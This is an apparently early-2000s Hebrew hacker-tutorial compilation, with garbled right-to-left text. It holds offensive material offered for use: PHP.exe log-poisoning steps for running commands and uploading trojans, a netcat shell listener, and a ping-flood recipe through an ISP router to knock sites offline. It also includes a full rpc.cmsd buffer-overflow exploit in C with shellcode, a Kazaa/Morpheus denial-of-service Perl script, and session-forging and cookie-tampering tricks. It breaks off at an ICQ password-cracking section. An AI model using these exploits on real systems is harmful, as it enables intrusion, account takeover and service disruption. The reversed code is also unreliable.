‫ללכת למישהוא שיש לו איי‪.‬די‪.‬אס‪.‬אל ולהפעיל את‬
‫‪!AccessDrive‬‬
‫מה שהתוכנה עושה זה לבדוק אקספוייטים של יוניקוד‪ ...‬אז במקום יוניקוד‬

‫נשים את רשימת הפיצוחים‬
‫האפשריים‪...‬‬
‫עכשיו! מה שהקוד עושה זה להוביל את המשתמש לדף בשם של הססמא‬
‫למשל‪:‬‬
‫אם כתבת את הססמא‬
‫‪1234567‬‬
‫הוא יוביל אותך לדף‬
‫‪htm.1234567‬‬
‫נריץ את בודק האקספלוייטים ובמקום לבדוק אם היוניקוד קיים נבדוק אם הדף‬

‫קיים‪ ...‬התוכנה תבדוק את כל‬
‫האפשרויות‪ -‬כמו בברוט פורס‬
‫עד שהיא תגיע לתשובה הנכונה!!!!‬
‫כל הזכויות שמורות ל‬
‫‪House‬‬
‫רוט אקסס בעזרת ‪php.exe‬‬

‫טקסט זה נכתב ע"י‬
‫‪cool-abdool‬‬
‫‪ php.exe‬רוט אקסס דרך‬

‫‪++++++++++++++++++‬‬
‫תקציר‬
‫______‬
‫באג רציני שהתגלה ב‬
‫‪php‬‬
‫של ווינדואז‪ ,‬הבאג יאפשר לתוקף למצל את ה‬
‫‪php‬‬
‫לראות קבצים מחוץ לגבולות ה‬
‫‪html‬‬
‫ולהריץ דברים ע"י שינוי הלוג אפאצ'י‬
‫הדברים שניתן לעשות‪:‬‬
‫להריץ‬
‫‪exe‬‬
‫לראות‬
‫‪html‬‬
‫מלא לדוגמא אם יש שימוש ב‬
‫‪asp‬‬
‫אז לא תראו את החלקים המוסתרים ודרך הבאג כן תראו‬
‫ותוכלו גם להעלות קבצים‬
‫פרטים‬
‫_____‬
‫מערכות פגיעות‪:‬‬
‫‪PHP version 4.0 with Apache server version 2.0‬‬
‫הבאג‬
‫____‬
‫נניח שעל הסרבר מותקן‬
‫‪apache‬‬
‫בתיקיה‬
‫‪c:\apache‬‬
‫והקובץ‬
‫‪php.exe‬‬
‫מותקן במיקום הרגיל שלו‬
‫)‪(c:\php\php.exe‬‬
‫אז הצעדים לקבלת רוט הן‪:‬‬
‫כתבו בדפדפן‬
‫‪http://www.siteName.com/<? (1‬‬
‫‪<?%20system('TheCommandToExecuteWithPath');%20‬‬
‫שרת האפאצ'י יוסיף את השורה הזאת לקובץ‬
‫‪) access.log‬ראו יצירת לוגים בחלק של האבטחה(‬
‫‪ (2‬עכשיו אחרי שהשורה קיימת בקובץ אפשר להריץ אותה עם‬

‫‪http://www.siteName.com/php/php.exe?c:\apache\logs\access.log‬‬
‫‪ (3‬הדרך לקבלת רוט היא דרך הפקודה‬

‫"‪" nc -l -n -v -p‬‬
‫ל איי פי שלכם!‬
‫‪(4‬העלאת קובץ‬
‫צרו קובץ טקסט על השרת שלכם שנקרא‬ ‫‪(a‬‬

‫‪test.txt‬‬
‫תכתבו בתוכו שורה קצרה‬ ‫‪(b‬‬
‫תבתקו את גודל הקובץ בבייטים‬ ‫‪(c‬‬
‫תבדקו שניתן להכנס לקובץ על ידי הדפדפן‬ ‫‪(d‬‬
‫) ‪( http://www.mySite.com/test.txt‬‬
‫‪ (e‬עכשיו עלכם ליצור ‪ 4‬ריקואסטים אם העמוד לא יטען אל תדאגו רק בשום‬

‫פנים אל תלחצו על רענן!!!‬
‫)‪(requests‬‬
‫?<‪http://www.siteName.com/‬‬
‫‪<?;("$fp=fopen("http://www.mySite.com/test.txt"," rb‬‬
‫חקו ‪ 10‬שניות וכתבו‬

‫‪http://www.siteName.com/<?$contents=fread($fp,‬‬
‫‪) <?;([[REPLACE_WITH_THE_SIZE_OF_YOUR_FILE‬זוכרים שקודם ביקשתי ממכם‬
‫לבדוק את הגודל של הקובץ‪(...‬‬
‫חקו ‪ 10‬שניות וכתבו‬
‫?<‪http://www.siteName.com/‬‬
‫‪<?;("$fq=fopen("c:/Apache2/htdocs/test.txt","wb‬‬
‫חקו עשר שניות ותציפו את הלוג ע"י קריאה לקובץ שלא קיים‬
‫‪http://www.siteName.com/notExistingFile.txt‬‬
‫חקו עשר שניות וקיראו חזרה ללוג‬
‫‪http://www.siteName.com/php/php.exe?c:\apache2\logs\access.log‬‬
‫לחצו רענן כדי להיות בטוחים שהוא מעודכן!‬
‫עכשיו בדקו אם הקובץ עלה‬
‫‪http://www.siteName.com/test.txt‬‬
‫מה אפשר לעשות עם זה‪:‬‬
‫עם הבאג הזה אפשר להעלות לסרבר טרויינים‪ ,‬וירוסים‪ ,‬תוכנות ששלוחות לכם‬
‫מידע על פעולות בשרת ועוד הרבה!!!!‬
‫עליכם להעלות טרויין שבנוי ב‬

‫‪!cgi‬‬
‫אני יכתוב על זה טקסט‬
‫וירוס‬
‫מדריך קצר על וירוסים\נכתב ע"י ‪Neo_Guns‬‬
‫~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~‬
‫הערה‪ :‬לצפייה טובה יותר בטקסט ליחצו ‪ alt+shift‬בצד ימין של המקלדת‪.‬‬
‫מה במדריך?‬
‫חלק א'‪ -‬הגדרת וירוס‪.‬‬

‫חלק ב'‪ -‬סוס טרויאני‪.‬‬
‫חלק ג'‪ -‬תולעת‪.‬‬
‫‪-----------------------------------------------------------------‬‬
‫חלק א'‪ -‬הגדרת וירוס‪.‬‬

‫^^^^^^^^^^^^^^^^^^^^‬
‫וירוס זה תוכנה )קטנה או גדולה( שמטרתה היחידה היא לגרום נזק למחשב‪.‬‬
‫הוירוס יכול לפגוע בכל "איברי" המחשב גם באופן תוכנתי לדוגמא‪:‬‬
‫מחיקת קבצים חשובים במערכת ההפעלה‪ ,‬פירמוט המחשב‪ ,‬מחיקת הווינדוס‬
‫וכדומה‪...‬‬
‫והוירוס גם יכול לפגוע גם באופן חומרתי‪ ,‬לדוגמא‪:‬‬
‫דפיקת הביוס‪ ,‬הצפת מדפסת‪ ,‬ואפילו חבר שלי "מורפיוס ‪ "666‬בנה וירוס ששורף‬
‫את‬
‫המסך )אל תשאלו אותי איך‪ ,‬הוא לא נותן לי את הסורס( וכדומה‪...‬‬
‫חלק ב'‪ -‬סוס טרויאני‪.‬‬

‫^^^^^^^^^^^^^^^^^^^^‬
‫סוס טרויאני הוא וירוס שאינו מופעל ברגע שהוא מגיע למחשב אלא מחכה‬
‫לתאריך מסוים )דוגמת הטרויאני "רולטה רוסית"( להפעלת תוכנה מסוימת‪,‬‬
‫עידכון האנטיוירוס )היה לי כזה‪ ,‬איזה באסה זה היה( וכדומה‪...‬‬
‫חלק ג'‪ -‬תולעת‪.‬‬

‫^^^^^^^^^^^^^^‬
‫תולעת היא קובץ שברגע שהוא מגיע למחשב הוא מפעיל את עצמו‪ ,‬מה שחזק בו‬
‫ואין בסוס טרויאני זה שהואגם שולח את עצמו לכל הרשימה באימייל‪,‬‬
‫באייסיקיו‬
‫ובכל דרך שהיא הוא משכפל את עצמו‪ .‬התולעת הראשונה שהייתה למיטב זכרוני‬
‫היא‬
‫"מליסה" והכי חזקה שהייתה‪ ,‬או הכי ידועה היה כמובן "וירוס האהבה"‬
‫)נדבקתי בו‪,‬‬
‫אתם לא יודעים איך נלחצתי‪.(...‬‬
‫זהו‪ ,‬כאן בא לסיומו מדריך קצרצר על וירוסים‪ ,‬שאולי יהיו לו המשכים‪,‬‬

‫למרות שאני לא‬
‫חושב כך‪ ,‬אבל בכל מקרה‪ ,‬אל תשכחו להיזהר‪ ,‬ואל תהיו כמו שהייתי שעידכנתי‬
‫את האנטיוירוס‬
‫שלי כל יובל‪ ,‬עד שנדבקתי בוירוס האהבה והתחלתי לעדכן בקביעות‪ ,‬אז פשוט‬
‫תקדימו תרופה למחלה‪.‬‬
‫מי שרוצה הסבר יותר מפורט )למרות שאני לא חושב שיש מה לא להבין( יכול‬
‫ליצור איתי קשר‬
‫באייסיקיו‪:‬‬
‫‪147607610‬‬
‫או באימייל‪:‬‬
‫‪Neo_Guns@walla.co.il‬‬
‫‪-----------------------------------------------------‬‬
‫אין להעתיק‪ ,‬לשכפל ולגנוב בכל דרך שהיא ללא רשות מפורשת‬
‫מ‪.Neo_Guns-‬‬
‫כל הזכויות שמורות © ל‪Neo_Guns-‬‬
‫פריצה לאיי די אס אל של בזק‬

‫‪ADSL EXPLOITS‬‬
‫________________‬
‫שימו לב‪ :‬לבזק יש את השרת‬

‫‪adsl‬‬
‫שהאיי פי שלו הוא‬
‫‪10.0.0.138‬‬
‫אין לי מושג אם זה עובד על שרתים אחרים‪.‬‬
‫להפיל אתר‬
‫‪++++++++++++++‬‬
‫אז תפתחו את טלנט‪:‬‬
‫ותתחברו ל‬
‫‪10.0.0.138‬‬
‫פורט‪:‬‬
‫‪23‬‬
‫יעלה לכם אחרי מספר שניות הלוגו של החברה‬
‫אחר כך יופיע לכם הסימן‬
‫=<‬
‫שם תכתבו‬
‫‪(ip (=>ip‬‬
‫מיד יופיע לכם הסימן‬
‫]‪<=[ip‬‬
‫‪ping‬‬
‫מיד יופיע לכם‬
‫‪= addr‬‬
‫שם תכתבו את האיי פי של האתר או המחשב שאתם רוצים להרוג‬
‫מיד לאחר שכתבו את האיי פי ותלחצו אנטר יופיע לכם‬
‫]‪=[Count‬‬
‫‪1000000‬‬
‫]‪=[size‬‬
‫‪20000‬‬
‫]‪=[interval‬‬
‫‪1000000‬‬
‫]‪=[listen‬‬
‫פשוט תלחצו אנטר וחקו! כאן סיימתם להפיל את האתר‪...‬‬
‫רשימת השרתים‬
‫‪++++++++++++++‬‬
‫תתחברו עם טלנט ל‬
‫‪23 10.0.0.138‬‬
‫תכתבו‬
‫‪phonebook‬‬
‫]‪<=[phonebook‬‬
‫‪list‬‬
‫ותופיע לכם רשימת השרתים!‬
‫תקיות בלתי נגישות‬
‫‪this text was written by spider-master‬‬
‫______________________________________‬
‫הערה חשובה‪ :‬נא לגבות את כל הקבצים שישומשו ע"י‬
‫אין צוות האתר או אני אחריים על בעיות\תקלות ובלה בלה אתם יודעים את ההמשך‬
‫אהלן אחים שלי‬
‫אני ילמד אתכם הפעם איך ליצור תיקיות לא נגישות בווינדואוס‬
‫מה זאת אומרת?‬
‫אז ככה היום נילמד איך לעשות תיקיה שאי אפשר לשנות לה את השם ואי אפשר למחוק אותה‬
‫ואי אפשר להכנס אלה ו‪ ....‬הבנתם את הרעיון‪.‬‬
‫אז ככה מה עושים‬
‫א‪ .‬צרו תיקיה במקום שקל לכם להגיע אליו דרך דוס‬
‫נגיד בכונן‬
‫נגיד תיצרו תיקיה בשם‬
‫‪spider-master‬‬
‫כך שזה יהיה ממוקם ב‬
‫‪C:\spider-master‬‬
‫או קיי?‬
‫עשיתם?‬
‫יפה מאוד עכשיו אנחנו הולכים להתחל‪ <---‬הפכל ורושמים‬
‫‪command‬‬
‫או איך שנוח לכם יש כמה שיטות לפתוח חלון דוס‬
‫עכשיו אנחנו רוצים להגיע לתיקיה הראשית אז עושים‬
‫‪\cd‬‬
‫תישרו לצד שמאל כדי לראות יותר טוב! ה‬
‫‪CD‬‬
‫בא לפני הסלש‬

‫עכשיו אחרי זה הסמן בדוס יראה כך‬
‫‪\:c‬‬
‫שוב תישרו לשמאל כדי לראות יותר טוב‬
‫עכישו משם אתם עושים את הפקודה הבאה‬
‫‪ren spider-master _spider-master‬‬
‫שוב תישרו לצד שמאל כדי לראות יותר טוב‬
‫עכשיו להסבר‬
‫הפקודה‬
‫‪ren‬‬
‫זה לשנות את השם של התיקיה! ה‬
‫הראשון זה השם של התיקיה שבעצם משנים לה את השם!‬
‫ה_ לפני הספיידר מסטר השני זה לא מכף תחתון כמו שכולכם חושבים!!!‬
‫מה שעושים זה קוד אסקיי!!!‬
‫איך עושים את זה‬
‫מרזיקים את המקש‬
‫‪Alt‬‬
‫ובזמן שמרזיקים את המקש הזה)בלי לעזוב לקשיי קליטה שבינכם!( לוחצים על‬
‫‪ 1‬אחרי זה ‪ 9‬אחרי זה ‪4‬‬
‫מה שבמילים אחרות זה‬
‫‪Alt+194‬‬
‫זה יצור לכם _ ואז אחרי הפעולה הזאת רושמים את השם של התיקיה שאתם רוצים במקרה הזה נגיד‬
‫וזהו‬
‫עכשיו תרשמו בדוס‬
‫‪exit‬‬
‫כנסו לכונן סי ותנסו להכנס לתיקיה של‬
‫הפלא ופלא אי אפשר‬
‫תנסו למחוק גם וגם לשנות את השם ובקיצור מה שאתם רוצים‬
‫עכישו בשביל להחזיר את התיקיה כדי שכן יוכלו לפתוח אותה‬
‫פשוט מחזירים לשם הרגיל ע"י הפעולה הבאה‬
‫‪ren _spider-master spider-master‬‬
‫וזהו עוד הפעם תחזרו לכונן סי ותנסו להכנס והפלא ופלא אפשר!‬
‫זה יעיל מאוד אם יש לכם אחים\חברים\אנשים חטטניים!‬
‫‪yours spider-master‬‬
‫‪-------------------------------------------------------------------------------------------------------‬‬
‫תודות לקול אבדול‬
‫‪Symantec pc-anywhere exploit‬‬

‫‪pc anywhere exploit‬‬
‫____________________‬
‫שימו לב כל מחשב שמחובר ל‬
‫‪symantec pc anywhere‬‬
‫פגיע אלא אם הוא מוריד פאטש מהאתר הזה‪...‬‬
‫‪ftp://ftp.symantec.com/public/english_us_canada/products/pcanywhere/p‬‬
‫‪canywhere32/ver8.0/updates/aw32tcp.dll‬‬
‫אז מה שעושים כדי להשתמש באקספלויט זה מגלים את מספר האיי פי של המחשב‬
‫שיש עליו את התוכנה‬
‫נכנסים אליו בפורט‬
‫‪5631‬‬
‫ואז ממלאים את המחשב ב ‪ 200‬קילו בייט של שטויות ואז מה שקורה זה החיבור‬

‫של ה‬
‫‪pc anywhere‬‬
‫נקטע וגם ה‬
‫‪cpu‬‬
‫נכבה כדאי לנסות!!!‬
‫‪Rpc.cmsd exploit‬‬
‫‪rpc.cmsd exploit‬‬
‫___________________‬
‫בעיית אבטחה ב‬
‫‪(rpc.cmsd(calendar Manager service‬‬
‫שמאפשרת לך לשנות ערכים עם גישה מלאה‬
‫האקספלויט פועל על‬
‫‪UnixWare 7.1.1‬‬
‫עכשיו תעתיקו את הקוד הבא לתוך קומפיילר‬
<include <stdlib.h#
<include <stdio.h#
<include <string.h#
<include <unistd.h#
<include <rpc/rpc.h#
define CMSD_PROG 100068#

define CMSD_VERS 4#
define CMSD_PROC 21#
define BUFFER_SIZE 1036#

define SHELL_START 1024#
define RET_LENGTH 12#
define ADJUST 100#
define NOP 0x90#
define LEN 68#
= []char shell
/*[xeb\x3d" /* jmp springboard [2000\" /* 0 */
/*[syscall: [2000 */
/*[x9a\xff\xff\xff\xff\x07\xff" /* lcall 0x7,0x0 [2000\" /* 2 */
/*[xc3" /* ret [2000\" /* 9 */
/*[start: [2000 */
/*[x5e" /* popl %esi [2000\" /* 10 */
/*[x31\xc0" /* xor %eax,%eax [2000\" /* 11 */
/* (x89\x46\xbf" /* movl %eax,-0x41(%esi\" /* 13 */
/* (x88\x46\xc4" /* movb %al,-0x3c(%esi\" /* 16 */
/* (x89\x46\x0c" /* movl %eax,0xc(%esi\" /* 19 */
/* (x88\x46\x17" /* movb %al,0x17(%esi\" /* 22 */
/* (x88\x46\x1a" /* movb %al,0x1a(%esi\" /* 25 */
/* (x88\x46\xff" /* movb %al,0x??(%esi\" /* 28 */
/*[execve: [2000 */
/*[x31\xc0" /* xor %eax,%eax [2000\" /* 31 */
/*[x50" /* pushl %eax [2000\" /* 33 */
/*[x56" /* pushl %esi [2000\" /* 34 */
/* x8d\x5e\x10" /* leal 0x10(%esi),%ebx\" /* 35 */
/*[x89\x1e" /* movl %ebx,(%esi)[2000\" /* 38 */
/*[x53" /* pushl %ebx [2000\" /* 40 */
/* x8d\x5e\x18" /* leal 0x18(%esi),%ebx\" /* 41 */
/* (x89\x5e\x04" /* movl %ebx,0x4(%esi\" /* 44 */
/* x8d\x5e\x1b" /* leal 0x1b(%esi),%ebx\" /* 47 */
/* (x89\x5e\x08" /* movl %ebx,0x8(%esi\" /* 50 */
/*[xb0\x3b" /* movb $0x3b,%al [2000\" /* 53 */
/*[xe8\xc6\xff\xff\xff" /* call syscall [2000\" /* 55 */
/*[x83\xc4\x0c" /* addl $0xc,%esp [2000\" /* 60 */
/*[springboard: [2000 */
/*[xe8\xc6\xff\xff\xff" /* call start [2000\" /* 63 */
/*[data: [2000 */
/*[xff\xff\xff\xff" /* DATA [2000\" /* 68 */
/*[x2f\x62\x69\x6e\x2f\x73\x68\xff" /* DATA [2000\" /* 84 */
/*[x2d\x63\xff"; /* DATA [2000\" /* 92 */
} struct cm_send
;char *s1
;char *s2
;{
} struct cm_reply
;int i
;{
(bool_t xdr_cm_send(XDR *xdrs, struct cm_send *objp

}
((if(!xdr_wrapstring(xdrs, &objp->s1
;(return (FALSE
((if(!xdr_wrapstring(xdrs, &objp->s2
;(return (FALSE
;(return (TRUE
(bool_t xdr_cm_reply(XDR *xdrs, struct cm_reply *objp

}
((if(!xdr_int(xdrs, &objp->i
;(return (FALSE
;(return (TRUE
} ()long get_ret
;return 0x8047720
int
([]main(int argc, char *argv
}
;[char buffer[BUFFER_SIZE + 1
;long ret, offset
;int len, x, y
;char *command, *hostname
;CLIENT *cl
;struct cm_send send
;struct cm_reply reply
;{ struct timeval tm = { 10, 0
;enum clnt_stat stat
} (if(argc < 3 || argc > 4

;([printf("Usage: %s [hostname] [command] [offset]\n", argv[0
;(exit(1
..end of if // {
;[hostname = argv[1
;[command = argv[2
;([if(argc == 4) offset = atol(argv[3

;else offset=0
;(len = strlen(command
;++len
;len = -len
;shell[LEN+0] = (len >> 0) & 0xff
;(shell[30] = (char)(strlen(command) + 27
;ret = get_ret() + offset
;for(x=0; x<BUFFER_SIZE; x++) buffer[x] = NOP

x = BUFFER_SIZE - RET_LENGTH - strlen(shell) - strlen(command) - 1 -
;ADJUST
(++for(y=0; y<strlen(shell); y
;[buffer[x++] = shell[y
(++for(y=0; y<strlen(command); y
;[buffer[x++] = command[y
;'buffer[x] = '\xff
;x = SHELL_START
(for(y=0; y<(RET_LENGTH/4); y++, x=x+4
;int *)&buffer[x]) = ret))*
;buffer[x] = 0x00
;(printf("host = %s\n", hostname

;(printf("command = '%s'\n", command
;(printf("ret address = 0x%x\n", ret
;((printf("buffer size = %d\n", strlen(buffer
;send.s1 = buffer
;"" = send.s2
;("cl = clnt_create(hostname, CMSD_PROG, CMSD_VERS, "udp

} (if(cl == NULL
;("clnt_pcreateerror("clnt_create
;("printf("exploit failed; unable to contact RPC server\n
;(exit(1
{
;(cl->cl_auth = authunix_create("localhost", 0, 0, 0, NULL
,stat = clnt_call(cl, CMSD_PROC, xdr_cm_send, (caddr_t) &send
;(xdr_cm_reply, (caddr_t) &reply, tm
} (if(stat == RPC_SUCCESS
;("printf("exploit is failed!!\n
;(clnt_destroy(cl
;(exit(1
} else {
;("printf("Maybe, exploit is success!!\n
;(clnt_destroy(cl
;(exit(0
{
{
‫זיוף סשנים‬
cool-abdool
‫זיוף סשנים‬
________
‫זיוף סשנים על שרתי‬
php 4.x
‫בברירת המחדל של השרתים הללו ה‬
sessionID
‫לא נשמר בתיקיה מוגנת אלא בתיקיה‬
tmp
‫זה יתן לכל האקר לזייף ולשנות‬
sessionID
‫קיימים וזה יתן לו גישה ל‬
‫‪acounts‬‬
‫של אנשים אחרים‬
‫מה זה בעצם‬
‫‪???session‬‬
‫‪+++++++++++++++++‬‬
‫הסשן דרוש לזהוי אנשים זה מועבר לדפדפן ומשם או שזה חלק שמתווסף לכתובת‬
‫או שזה נשמר בעוגיה‬
‫עם כל פעולה שהמשתמש עושה הסשן נשלח לסרבר ועובר שינויים וחוזר לדפדפן‬
‫)לכל אלה שתוהים למה שהשרת פשוט יזכור את המספר איי פי של אותו משתמש‬
‫וכך יאפשר לו לבצע פעולות??? התשובה לכך היא ש‬
‫‪proxys‬‬
‫יכולים לתת גישה לכמעט כל איי פי(‬
‫ברגע שהמשתמש יוצא מהאתר גם נעלה הסשן ונמחק‬
‫מכירים את בקאונטרים שסופרים כמה אנשים יש באותו רגע באתר זה קאונטרים‬
‫שסופרים את הסשנים‬
‫תמיכה של‬
‫‪php‬‬
‫ב‬
‫‪sessions‬‬
‫‪+++++++++++++++++++‬‬
‫מאז‬
‫‪php 4‬‬
‫יש תמיכה טבעית לסשנים שמיובאת מה‬
‫‪PHPLib‬‬
‫במקום שימוש ב‬
‫‪sql‬‬
‫הסשנים נשמרים בקבצים בתיקיה‬
‫‪tmp/‬‬
‫כל סשן שמור בקובץ דומה לזה‪:‬‬

‫‪sess_g35g5g54gg45wg85‬‬
‫החלק של ה‬
‫‪g35g5g54gg45wg85‬‬
‫זה ה‬
‫‪sessionID‬‬
‫מישהו עכשיו בקלות יכול לזייף את הסשנים האלו בגלל שעכשיו הוא יודע את ה‬
‫‪sessionID‬‬
‫עכשיו תצרו תיקיה באופן הבא‬

‫‪/mkdir /tmp/php_sessions‬‬
‫שנו את הקובץ‬
‫‪php.ini‬‬
‫כך שיצביע על התיקיה שיצרתם‬
‫ותבצעו‬
‫‪chown www-data: php_sessions‬‬
‫בהצלחה‬
‫שינוי עוגיות‬
‫שינוי עוגיות‬
‫_________‬
‫לכל אלה שעדיין לא יודעים עוגיות‬
‫)‪(cookies‬‬
‫הם קבצי טקסט שנשמרים על המחשב כאשר נכנסים לאתר שיוצר אותם‬
‫דוגמה לאתרים כאלה‪:‬‬
‫‪geocities‬‬
‫‪yahoo‬‬
‫‪hotmail‬‬
‫‪tripod‬‬
‫‪geeklog‬‬
‫)‪most of the free web hosting sites and most of the mail servers and‬‬
‫‪(stuff‬‬
‫העוגיות נשמרות בתיקיה שנקראת‬
‫‪cookies‬‬
‫בתוך התיקיה‬
‫‪windows‬‬
‫אוקיי הבנו איפה יש עוגיות אבל למה יש עוגיות התשובה מאוד ברורה בהרבה‬
‫אתרים יש‬
‫כל מיני שאלות למשל‬
‫איזה צבע היית מעדיף לרקע אתה בוחר למשל צבע אדום והרקע משתנה לאדום‬
‫אחרי שאתה יוצא מהאתר אתה נכנס שוב והפלא ופלא‬
‫עדיין הרקע בצבע אדום‬
‫למה?? כי השרת של האתר קרא מתוך העוגיות את הצבע שבחרת בפעם הקודמת‬
‫שהיית האתר וידע לשים‬
‫זה‪ .‬מה שקורה בשרתי דואר למשל זה הדבר הבא אתה עושה‬
‫‪login‬‬
‫לשרת דואר שלך נגיד הוטמייל ואתה מסמן‬
‫‪save my password‬‬
‫מה זה אומר כשאתה מסמן את‬
‫‪save my password‬‬
‫נוצר לך קובץ עוגייה חדש שמכיל את הפרטים שמאפשרים לשרת‬
‫להכניס אותך בלי צורך למלא סיסמה אבל כל זה טוב ויפה עד שחבר שלך או כל‬
‫אחד אחר מגיע אליך הביתה ובחצי דקה כשאתה בשרותים מעתיק את כל העוגיות‬
‫לדיסקט אם הוא יעתיק מהדיסק למחשב שלו יהיה גישה‬
‫לכל המקומות שלך יש גישה אליו ב א ס ה ! ! ! לכן לייתר ביטחון‬
‫כדאי לא לעשות‬
‫‪.save my password‬‬
‫עכשיו לשינוי!!!‬
‫ברוב האתרים זה לא יעבוד כי הם דרשים גם שם משתמש וגם סיסמה בתוך‬
‫העוגיות אבל למשל באתר‬
‫‪geeklog‬‬
‫אפשר להכנס על שם מישהו אחר רק ע"י שינוי שם המשתמש בעוגייה !!!‬
‫בגים בקאזה ומורפיוס‬

cool-abdool
‫איך להעיף אנשים מקאזה ומורפיוס ואיך לפרוץ להם למחשב‬

____________________________________
‫אז זה בג מאוד חביב שקיים בתוכנות האלו וזה כמו כל‬
overflow
!‫אחר אבל נחמד‬
‫אז הנה השאלל קוד של זה‬
usr/bin/perl/!#
Usage: ./km.pl -h victimip#
;use Socket
;use Getopt::Std
;(getopts("h:", \%args
;("print("\nK/M Denial of Service\n

} ({if (!defined $args{h
;("print("Usage: km.pl -h victimip\n\n
{ ;exit
;{host = $args{h$
target = inet_aton($host) || die("inet_aton problems; host doesn't$
;("?exist
;trash="A"x100$
;(exec_cmd($command&
} sub exec_cmd
(++for($count=1;$count<=1000;$count
}
;("sendraw("GET /\"$trash\" HTTP/1.0\n\n
;("|")print
{
;("print("\nData Sent.\n\n
{
} sub sendraw
;_@=(my ($pstr
|| (socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0
;("die("Socket problems\n
}((if(connect(S,pack "SnA4x8",2,1214,$target
;my @in
;select(S); $|=1; print $pstr
;_$ ,while(< S >){ push @in
{;({print STDOUT "." if(defined $args{X
;select(STDOUT); close(S); return @in
{ ;("else { die("Can't connect...\n {
{
‫זה יעיף את המשתמש בתציינו‬
!!!‫חחחחחחחחחחחחחחח כמה שאנחנו רעים‬
‫הנה הדרך לפרוץ לאנשים האלו למחשב דרך טלנט‬
telnet morpheus.users.ip.address
...Trying morpheus.users.ip.address
.Connected to morpheus.users.ip.address
.'[^' Escape character is
GET / HTTP/1.0
‫‪HTTP/1.0 200 OK‬‬
‫‪{X-Kazaa-Username: {USER NAME HERE‬‬
‫‪X-Kazaa-Network: MusicCity‬‬
‫‪X-Kazaa-IP: morpheus.users.ip.address:1214‬‬
‫‪X-Kazaa-SupernodeIP: 130.74.237.54:1214‬‬
‫כמו שאתם רואים זה לא מדריך למתחילים וזה פשוט מדהים כמה חרא!!! יש‬
‫בתוכנה קטנה בהצלחה‬
‫רג'סטרי חלק ‪'4‬‬

‫אהלן אחים שלי‬
‫טוב הפעם אנ ילמד אתכם איך לעשות שמה שיש בתמונה מסויימת יראה כאייקון‬
‫אם לא הבנתם תמשיכו לעקוב אני מבטיח שתבינו עד סוף המדריך הזה‪.‬‬
‫אז כותב כל כל הזכויות שמורות ל‬
‫‪hack-planet‬‬
‫ואל תגנבו את זה‬
‫מדריך זה נוצר ללמד אתכם דברים ולא לשמש בשום צורה שהי למטרות רשע ופשע‬
‫אין באחריותי או באחריות האתר והצוות שום נזק שניגרם ישירות או בהקיפין למחשבכם‬
‫כחו את זה בחשבון‪.‬‬
‫אז ככה קודם כל אנחנו ניצור קובץ‬
‫‪bmp‬‬
‫)למיש לא יודע זה קובץ צייר של ווינדואוס(‬
‫ונשרבט)איזה שפה גבוה יש לי אה?( משהו‬
‫עדיף שתשרבטו קוים עווים או שטויות כדי לראות את זה בהמשך יותר טוב‬
‫)אתם תבינו אחר כך(‬
‫עכשיו אחרי שעשינו את זה אנחנו נישמור את הקובץ לא משנה איפה‬
‫לצורך העיניין נגיד שבדסקוטף‬
‫עכשיו אחרי שעשינו את זה ויש לנו ציור של פיקאסו)תגידו תודה על המחמאה וזהו( אנחנו ניפתח‬
‫את הרג'סטרי‪.‬‬
‫וכבר הסברתי במדריכים הקודמים שלי על הרג'סטרי איך לעשות את זה‪.‬‬
‫אז לכו לאחד מהם ותפתחו אותו‪.‬‬

‫עכשיו אנחנו ניכנס ל‬
‫‪HKEY_CLASSES_ROOT\Paint.Picture\DefaultIcon‬‬
‫או קיי אתם שם?‬
‫נוווווו‬
‫היום?‬
‫טוב מי שלא הספיק זה בעיה שלו‬
‫קיצר אתם רואים שם קובץ בשם‪:‬‬
‫)‪(Default‬‬
‫שתי לחיצות עליו ויש לכם בשדה משהו כזה‬
‫‪C:\Progra~1\Access~1\MSPAINT.EXE,1‬‬
‫אתם מוחקים הכללללללללללללללללל‬
‫ובמקום מה שיש שם אתם רושמים‬
‫‪ %1‬שה‪%‬‬
‫הוא הכי שמאלי‬
‫אתם עושים אישור ויוצאים מהרג'סטרי‬
‫אחרי זה אתם עושים רענן ע"י לחיצה על ‪F5‬‬
‫ותסתכלו על הקובץ‬
‫‪bmp‬‬
‫שיצרתם‬
‫אם שום דבר לא קרה אתם לוחצים‬
‫‪Ctrl+Alt+Del‬‬
‫ובוחרים ב‬
‫‪explorer‬‬
‫ועושים‬
‫‪end task‬‬
‫ואז יופיע לכם מסך כיבוי המחשב ואתם עושים ביטול‬
‫ומחכים ואז יהיה לכם עוד מסך שישאל אם אתה רוצים באמת לסגור את התוכנית תילחצו על‬
‫‪end task‬‬
‫ואז זה כאילו יעשה לכם ריפרש כזה ואז תיסתכלו על הקובץ ‪ bmp‬שיצרתם‬
‫‪?well‬‬
‫‪?what do u think‬‬
‫נחמד אה?‬
‫או קיי זה בנוגע לקבצי‬
‫‪bmp‬‬
‫מה לגבי שאר הקבצים?‬
‫או קיי אז ככה‬
‫נגיד שיש לכם קובץ תמונה‬
‫שאתם רוצים לראות איך הוא נראה בלי לפתוח אותו אז נגיד שהקובץ נימצה בתיקיה בשם‪:‬‬
‫"האק פלאט"‬
‫אז מה שאנחנו עושים זה הולכים לתיקיה הזאת לא ניכנסים אליה!!!! עושים קליק ימיני עליה‬
‫ובוחרים באפשרות‬
‫‪Properties‬‬
‫יפה עכשיו ניפתח לכם החלון הגדרות שלו‬
‫שם יהיה לכם כל מיני אפשרויות לבחור והכי הכי למטה יהיה לכם‬
‫‪Enable thumbnail view‬‬
‫סמנו את זה!!! ולחצו אישור‬
‫עכשיו כנסו לתוך התיקיה הזאת‪ .‬עכשיו בתפריט העליון)נו זה עם הקובץ‪ ,‬ערוך‪ ,‬פייבוריטס וכו‪(...‬‬
‫בחרו ב‬
‫‪View‬‬
‫ושם איפשה שאתם בוחרים אם אתם רוצים אייקונים בצורת רשימה או‬
‫אייקונים גדולים או אייקונים קטנים יתווסף לכם עוד אפשרות בשם‬
‫‪Thumbnails‬‬
‫תבחרו אותה‪ .‬עכשיו סתכלו על התמונות‪.‬‬
‫וזהו ניגמר‬
‫מקווה שנהנתם‬
‫‪------------------------------------------------------------------------------------------‬‬
‫תודות ל‪ :‬קול אבדול‬
‫השגת סיסמה ופרטים של משתמשי איי סי קיו‬

‫נכתב ע"י‬
‫==============‬
‫אהלן חברה והיום בפינתנו‪ ....‬איפה נימצאת לעזזל הסיסמא של האי סי קיו‬
‫ואיך מפצחים אותה???‬
‫אז ככה‪:‬‬
